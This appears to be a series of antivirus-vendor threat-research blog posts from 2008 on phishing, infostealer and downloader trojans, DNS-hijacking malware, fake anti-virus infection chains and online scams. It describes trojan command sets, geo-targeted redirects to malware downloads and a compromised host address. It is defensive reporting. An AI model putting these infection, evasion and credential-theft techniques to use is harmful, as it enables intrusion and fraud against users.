The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activities. Various Morocco hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

On the defaced page, one attacker–whose email address is m0×0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

Speaking with the discoverers of this identity theft attempt and looking at the code, I noted the stolen data were sent to the same m0×0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As result of some searches I made today, I would not be surprised if this second guy (if it is not the same as the first) was also involved in some fake auction operations.

Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

Today a new downloader trojan is being spammed widely. This spam message arrives as a reply to the victim’s query of asking for the wire transfer.

When users run the file “bank_statement.scr” in the attachment zip file, it downloads the BackDoor-DSG trojan, while in the background it downloads an innocent pdf document from a legit site and opens it for deception. The pdf document, however, is not relevant to the wire transfer.

We see that the trojan file is repacked for each message, thus none of them are identical. In addition to that, this time the malware authors are changing resource sections in those pe files such as Icons, and file properties.

For example, we observed following icons:

Other resources:

File Descrption:

• Auto-reader Module
• Reader_Module
• Adobe Reader HSMC
• Adodb_SSL_reader

Translation:

• English
• Spanish
• Korean

CompanyName:

• Adobe
• ADOBE

These crafted resources, as well as the malicious code, are the result of server-side polymorphism to attempt to evade detections by Anti-Virus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr trojan, and dropped files as BackDoor-DSG with DAT 5474 or later.

From fake online banking to regionally targeted celeb porn - that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started to promote a fake “Bank of America” web site, announcing a change of the online banking’s interface to its “customers.” For these “customers” to be able to have a quick look at the “demo” page, a preview link is provided as shown in the sample spam mail:

Innocent users that follow the lure by clicking the link are presented a fake banking web site which uses the well known missing-codec-trick that is used to convince users into downloading an additional component for a website or video to work. This time it is an apparent update for “Adobe Flash Player” which they require you to install for their “demo page” to work. The update of course isn’t any legit software but a trojan instead.

We have taken a concise look under the trojan’s hood - it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and in the end may either be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed - the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among this private information are POP3, IMAP and FTP server credentials but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan moreover is capable of receiving and executing commands from the malicious host that it phones home to, so the malware’s behavior may change and “improve” anytime.

The list of commands currently understood by this variant of the trojan is as follows:

• “VER” - sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
• “EXE” - updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
• “DL” - downloads an executable from the Internet (but doesn’t run it)
• “DL_EXE” - downloads and runs an executable from the Internet
• “DL_EXE_ST” - downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
• “REBOOT” - forces the computer to reboot

An additional spam run targeting Swiss Internet users has been reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German language, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link contained in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celeb page are told to not work without a codec - too bad! This time the user is bribed with a high definition video plugin named “Adobe Player HD plugin”. Again, this of course isn’t a missing codec but rather a trojan aimed at downloading further malware. Noteworthy about this downloader is it’s contacting a web server with a traffic management system installed - contextual to the user’s Geo-Location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

By comparing the malware currently spread by the malicious host, Swiss residents are delivered a variant of the same “Infostealer” family as seen in the “Bank of America” spam campaign shown above. Users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, and information being stolen on computers of victims from another country.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”, additional coverage is in the 5461 DATs.

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today, you’re likely to look at someone who’s never been on the Internet as an alien life form, many new users are surprisingly logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has shown to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complains received, the typical kind of scam that would give your common sense a chance to flex - Nigerian 419 scams - represented only a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email based scams, and seeks to illicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit crimes of identity theft. Phishing is a smoke and mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes consisted of over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 

Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.

Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix to avoid filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.

Multiple SIgn-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.

Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.

Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.

Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.

In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that don’t do much to them more resilient. None of these techniques will necessarily have any affect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mockup site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

Following the recent release of this year’s McAfee Virtual Criminology Report, I had the opportunity to talk with diverse European journalists. They asked me for some concrete examples of the malicious Internet “offers” that the economic crisis has produced.

Fake working-at-home opportunities
The most visible offers are not new; they are only more numerous. They involve fake recruitment sites proposing working at home, which promises to be well paid and less time consuming than an office job. In fact, these are offers for mule jobs, like the one I described last year.

No doubt these offers attract all types; but when it becomes hard to find a job, the offer can also appeal to honest people.

Fake banking services
Less well known and increasing, fake bank sites flourish over the ‘Net. These are not mirror sites used in phishing attacks; these sites are created solely to attract people searching for a financial institution that can help. When an authentic bank denies a loan, for example, what could be more natural than to search for a more welcoming business.

The next screen captures offer examples of two live websites among the 20 or so I discovered last week.

�

Fake investment firms
As we watch our investments decline in value, many of us are on the lookout for a high return. Would you welcome an 850 percent profit guaranteed within 24 hours?
 

These investments are beneficial–at least for the crooks who promote them. With scams like these, it’s not necessary to catch people by the hundreds to make a nice sum of money. But if you invest here, you’ll never again see your tied-up capital.

Fake legal services
Cybercriminals know the economic downturn can lead to more people going to court after a dispute with a banker or employer. Watch out for dubious legal offers.
 

Here, too, the “service” will ask you for a cash advance before starting the job, one which will never be honored.

In searching for scam sites I have found many other ripoffs, but I hope you are already convinced: Taking advantage of people who are already victims of financial problems is truly scandalous. Yet this is a reminder, as if proof were still necessary, that today’s crooks have no misgivings about abusing the most vulnerable among us.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Earlier today SANS posted an excellent blog on a recent variant of a DNSChanger Trojan. There are some significant implications to this threat, but before I go into those, here’s a brief rundown of the main DNS-changing Trojan tactics used to date:

1. Modify Windows Hosts file to map specific domain names to specific IP addresses (McAfee classifies these Trojans as QHOSTS Trojans, more of a precursor to DNSChangers
2. Modify Windows registry settings to reference specific (rogue) DNS servers [DNSChanger.f]
3. Create a scheduled task under Mac OS X to reference specific (rogue) DNS servers [OSX/Puper]
4. Exploit cross-site request forgery vulnerabilities in routers to overwrite the DNS server configuration offered to local area network clients [DNSChanger.f]

We’ve now seen a new tactic, which has the potential of impacting most devices on the local network–independent of the operating system or device (Windows, Linux, Internet-capable MP3 players,  digital picture frames, refrigerators, you name it). The tactic involves serving the rogue DNS server configuration over DHCP, the protocol responsible for distributing dynamic IP addresses, as well as other information, including DNS settings.

Here’s a scenario:

• Jill is using the free WiFi access point at her favorite coffee shop from her infected Windows laptop.
• Steve sits down at the next able and fires up his laptop, which requests an IP address over the wireless local area network.
• Jill’s PC injects a DHCP offer command to instruct Steve’s computer to route all DNS requests through a rogue DNS server.
• Steve fires up his web browser and navigates to his favorite social networking site, but while the browser displays the correct URL name, the rogue DNS server has actually directed the browser to another site.

The same applies to any local area network (LAN) where multiple system connect via DHCP.

This is significant for several reasons:

1. The DNSChanger/Puper/Zlob gang has been very successful, infecting millions of PCs during the last couple of years. This gang typically uses strong social engineering to entice victims into installing the malware.
2. Systems that are not infected with the malware can still have the payload of communicating with the rogue DNS servers delivered to them. This is achieved without exploiting any security vulnerability.
3. Locating a poisoned system on a sizable network is often a difficult task.
4. Noninfected systems can alter between using approved DNS settings and rogue settings based on an infected system being on the LAN, and a random chance that the infected system will be able to “poison” the DCHP offer.

For those interested in the details, this DNSChanger variant drops the legitimate ArcNet NDIS Protocol Driver in the drivers directory:

• %WinDir%\system32\drivers\ndisprot.sys

The Trojan uses this driver to inject DHCP Offer packets containing the rogue DNS server IPs.

Variants using this functionality are not known to be widespread at this point, though even a single infected system could potentially impact hundreds of other systems on the LAN. Though it’s awkward to check, users could examine their DNS settings to see if they have been impacted. For example, type the following from a Windows command prompt:

ipconfig /all

For insight into some of what the DNSChanger gang is after, see this post.

Fasten your seatbelts, for today we take you on a tour of fake-alert Trojans that have been doing rounds in the Internet lately. On this tour of various malware stations you’ll be taken to a system infected by a fake/rogue anti-virus application. Below is an example of a method implemented by such malware to infect a machine.

Here is your itinerary:

Station 1: Malicious web page that hosts a malware
Station 2: Browser helper object
Station 3: Fake/rogue anti-virus application downloader
Destination: Fake/rogue anti-virus application–infected system

The journey starts with a malicious web page that hosts a malware. Users reach these malicious pages through social engineering techniques such as a link via email/instant messanger, or redirection from a compromised legitimate website. A single click on these links will start the infection.

Upon visiting the malware-hosting web page, the user “buys a ticket” in the form of an executable file downloaded onto the system through some social engineering technique.

On our example tour,

• http://best[blocked]tube.net

When users visit the page above, they’re asked to download wmcodec_update.exe, which pretends to be a codec plug-in for Windows Media Player. A message box pops up repeatedly until users download the fake plug-in file, which is a Multi Dropper malware.

Upon execution, the downloaded file pops up a fake error message, as shown below:

The malware continues to execute and drops

1. Browser helper objects
2. Fake/rogue anti-virus application downloader

Our “tourists” now move to the next station, the browser helper object. At this station, the victims’ browsers are compromised. For example, a user’s search queries are manipulated to contain a link to another malicious web page. The following two images show the difference between a “clean” search and one made after a link to a malicious web page has been injected by the browser helper object. I have highlighted one malicious site; try to find five differences between the two images.

Before injection of the URL:

A compromised browser–after injection of the malicious URL:

Many spyware applications use browser helper objects to capture the surfing habits of users. This information is used later by the malware authors for pop-up ads relevant to search keywords, for example.

The next station on our tour is the fake/rogue anti-virus application downloader. Here users see two magazines, which are links to porn sites, on the desktop.

The fake application is downloaded without user intervention by the “fake” downloader. Finally the users systems are infected with a fake application malware.

At this point, users see a bogus alert from the fake application.

Scanning through the report generated by the fake app reveals that this report is exaggerated and false.

The fake-alert malware displays spurious alerts to entice users into buying products to “repair” the system from the fake, exaggerated threat.

Did you enjoy your fake-alert tour? Today, malware often work as a team to infect computers. In this tour, we saw a malicious web page hosting malware, Multi Dropper, a browser helper object, a downloader, and a fake alert work together for a common goal.

As always, we advise you to take precautions with fake plug-in downloads that loop infinitely–without giving you a chance to close that message box. Try to kill such processes of spurious messages through the Task Manager. Be careful about the links in your email, especially in anonymous mail and links in instant messages. Always practice “safe surfing,” which is the first step in keeping your computers clean.

It’s déjà vu again when Internet scamsters take advantage of the approaching Christmas holidays to entice computer users into opening malicious emails in the guise of holiday promotions or postcards. In the runup to Christmas, every year we see malware authors use varying themes to infect users. And this December is turning out to be no different.

Already into the first week of December, McAfee Avert Labs has observed two active spam campaigns using  malware-laced Christmas themes. The first is a spammed e-greeting that links to an IP address hosting an old school IRC/Bot SFX package. The animated image in the email is taken from a legitimate site while the bait IP address [202.82.11.4] belonging to a compromised web server based in Hong Kong.

The second threat is a new worm christened W32/Xirtem@MM. This worm has a built-in SMTP engine that mass mails copies of itself to email addresses harvested from an infected machine. It uses subjects ranging from Hallmark E-Cards to McDonalds and Coca-Cola Christmas promotions. And to lend authenticity to the email, the images displayed in the spammed email are directly borrowed from the parent websites of Hallmark, McDonalds, and Coca-Cola.

The worm also has the capabilities of spreading via removable storage devices and peer-to-peer networks. Upon execution, it displays the above picture to trick users into believing that it was a harmless image file.

The upcoming 5453 DATs to be released today contains detection for the W32/Xirtem@MM worm while users of McAfee Artemis Technology are already protected in real-time against these type of threats

In the coming weeks, these tactics will tend to evolve rapidly, from crude to sophisticated, as spammers increasingly use Christmas based themes to lure victims. With the level of sophistication seen in today’s threats, the malicious payload could easily be hidden within layers of obfuscation or clever social engineering, and could fool even the savviest of users who try to inspect an email before opening. It is therefore imperative that users are educated on how to avoid becoming a victim. Visit the McAfee Security Advice Center to learn all about online and computer safety tips to help you stay protected.

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visual and media friendly, please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it & I wanted to dig out something meaningful for our readers so I contacted a close partner of ours and got some real mailserver stats.

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though

This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

Look what we ran across in our spam traps recently:

$50 for a survey! It’s our unlucky day…

[Click for full size]

As you can see from the partially obscured email address it is clearly NOT from JP Morgan Chase!! I hope this variation on the theme is suspicious enough to set off most peoples “too-good-to-be-true” radar. We can expect this type of attack to get much more convincing real soon no doubt.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

I never thought I’d see the day!

ICANN found it’s dentures down the back of the sofa and taken a bite out of the criminals domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains problems “customers” ?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign Etc…). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

So here is my top 5 for today:

#1 Moniker - Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
#2 XIN NET - This is where the Pill spammers moved to and have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic - Same as above but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online - (Surprised to see them so high) Home of the unique URL “snowshoe” spammers ? almost legit ? The real world doesn’t care for their bulk and whois protected domains (via directi’s Logicboxes), or fake contacts.
#5 Dynamic Dolphin - Owned by Scott Ricter’s Media Breakaway, formerly bankrupted OptinRealBig . MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus - *.directNIC [Mikko's open letter]

This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but never the less, that (so I’m told) this is quick for ICANN

Hip Hip…

Last week, along with 1,200 other attendees from 47 countries, I was in Las Vegas at the FOCUS’08 McAfee Security Conference. In my opinion it was a great success; here are some on-the-spot comments.

On Tuesday, after the welcome session in which McAfee CEO Dave DeWalt announced, among others, the McAfee Initiative to Fight Cybercrime, I chose to hear my colleagues Toralv Dirro and Pedro Bueno present the state of cybercrime around the globe. In this session, the participants learned the actual methods used by cybercriminals: identity theft, phishing, password-stealing Trojans, virtual money laundering, and botnets. “The cybercrime industry is still booming,” the speakers explained. “It moves about US$100 billion per year and is the most successful sector of organized crime, growing 40 percent per year.”

Fortunately, the criminals do not win all the time. A supervisory special agent attached to the FBI Cyber Division gave us proof in the next session. Through example of “Alonzo X,” we learned how the police forces work to catch cybercriminals. Organizing and offering to sell parts of his botnet consisting of approximately 100,000 infected computers, Alonzo was responsible for sending thousands of spam between 2004 and 2007.

During this track, we learned that, as they do for drug rings, the FBI investigators infiltrate criminal operations. And they are sometimes on the horns of a dilemma: To help the inquiry, do they have the right to use for themselves a botnet they purchase and can they send themselves spam? We also learned how it was sometimes possible to calculate the fine by considering the expense for a computer repair ($200) and multiplying that amount times the number of infected computers. The police’s role is also to inform the victims that their computers are infected. It is not an easy task when you have a worldwide network of thousands zombie machines. Someone in the audience asked the agent how much Alonzo earned; the response was approximately $80,000 per year.

In the third track I attended, participants learned about the views of the U.S. Department of Homeland Security. To introduce his talk, Brett Lambo, the Director of the Cyber Exercise Program, gave us a brief outline of the situation: Today malicious insiders and cybercriminals have both the capabilities and the intent to use the Internet as a playground. Other nations, which also have the capabilities, may have the intent, while terrorist groups may have the intent but do not possess capability. Then, Lambo explained America’s cyberinfrastructure serves as a vital link among 17 critical infrastructure and key resource sectors, as well as providing a fundamental element of all emergency response operations at the federal, state, and local government levels. Since 85 percent of the critical infrastructure in the United States is owned by the private sector, this unity between the cyber response community in the government and private sector will be essential to effective protection and defense.

On Monday afternoon, I was busy with my own session: “Malware on Second Life–Myth or Reality?” As businesses begin to embrace virtual worlds, there’s more and more money involved. I conducted some research on this platform to demonstrate that Trojans, worms, phishing, and counterfeiting activities were not a myth. Here’s one incident I found: Two teenagers, 15 and 14 years old, have been convicted for virtual theft in the Netherlands. They had stolen a virtual amulet and mask in the multiplayer RuneScape game by forcing another player to transfer the items under the threat of violence. One defendant was sentenced to 200 hours service, the other to 160 hours. Yes, threats in virtual worlds are a new cause for concern.

One of the Wednesday events was the talk by colleagues George Kurtz and Brian Kenyon (”Hacking Exposed Live 2008.”) The conference room was just large enough to accommodate all the people wishing to see the live demonstration of today’s most advanced attacks and exploits. Perhaps some attendees found this report too technical. For my part, I thank the authors for the 140-page booklet they offered to all the participants.

Also that day I could not miss the report by Joe Telafici (one of my managers and vice president of operations for McAfee Avert Labs) on the “Economics and Finances of Cybercrime.” After a well-documented threat report that demonstrated the business sense of cybercriminals, Telafici explained that we had to “change the equation” by reducing rewards and making the web harder to use for criminals. “We need a multifunctional, cross-discipline, standards-based approach at fixing the protocols and applications [TCP/IP, DNS, SMTP, HTTP(S)] that make up the Internet,” he concluded.

I started Thursday by participating in the Craig Schmugar track on “Sō’shəl Ěn’jə-nîr’ĭng.” Social engineering is one of the most successful tactics attackers can use in committing cybercrime–by enticing a potential victim into performing a distinct action. After some examples, my Avert colleague explained that crimeware defense strategies were rarely discussed in public. First, they concern the trade secrets of the anti-malware industry; and, second, they could help criminals in their bad work if they were circulating. Social engineering defense, however, is a bit different. Schmugar discussed social engineering characteristics (source, destination, circumstance, content type), inspecting metadata (freshness of content, file names, extensions, path, ADS, web domain and site names), considering static binary properties (container, file size, icon, use of “obscure” functionality and digital signatures) and considering the environment (service names and description, registry references).

